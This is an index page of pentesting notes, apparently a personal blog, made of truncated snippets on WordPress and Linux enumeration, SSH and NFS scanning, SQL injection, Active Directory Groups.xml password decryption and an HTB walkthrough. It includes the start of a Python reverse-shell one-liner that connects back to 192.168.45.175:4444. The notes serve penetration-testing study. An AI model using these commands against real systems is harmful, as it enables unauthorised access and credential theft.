Shuciran Pentesting Notes

Wordpress

Default paths: index.php license.txt contains useful information such as the version WordPress installed. wp-activate.php is used for the email activation process when setting up a new WordP...

Automated Enumeration (Linux)

LinPeas We can use linpeas on UNIX derivatives such as Linux. ./linpeas.sh | tee output.txt Unix_privesc_check We can use unix_privesc_check on UNIX derivatives such as Linux. The script support...

For Privilege Access (Linux)

Find recursively a string: # Find ETSCTF on every file under the current directory find . -type f -exec grep -H 'ETSCTF' {} \; 2>/dev/null # Identify any file (not directory) modified in the las...

SSH (tcp-22)

Enumeration Cipher Algorithms supported: nmap -p22 10.10.1.3 --script ssh2-enum-algos Public key from ssh server: nmap -p22 10.10.1.3 --script ssh-hostkey --script-args= ssh_hostkey=full Review i...

NFS (tcp-111)

NMAP Scan port and info on NFS nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201 ... 111/tcp open rpcbind | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Us...

Reverse Shells

Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),...

SQL Injection MSSQL

Simple Commands Simple enumeration is to be abused with following queries such queries where taken from PayloadAllTheThings: # Version SELECT @@version # DB user SELECT user_name(); SELECT system_u...

SQL Injection

SQLi Authentication Bypass A SQL query for a normal login, then, looks like this: select * from users where name = 'tom' and password = 'jones'; If we control the value being passed in as $user, ...

Active (Easy)

Host entries 10.10.10.100 active.htb If Active Directory => NTP Synchronization with the domain controller. Content SMB Enumeration SMB Full share replication to local machine [[SMB Dow...

SYSVOL (Groups.xml)

If we have access to a SYSVOL file, we can extract the “Groups.xml” file and decrypt the cpassword with gpp-decrypt utility: # Contents of Groups.xml cat ./active.htb/Policies/{31B2F340-016D-11D2-9...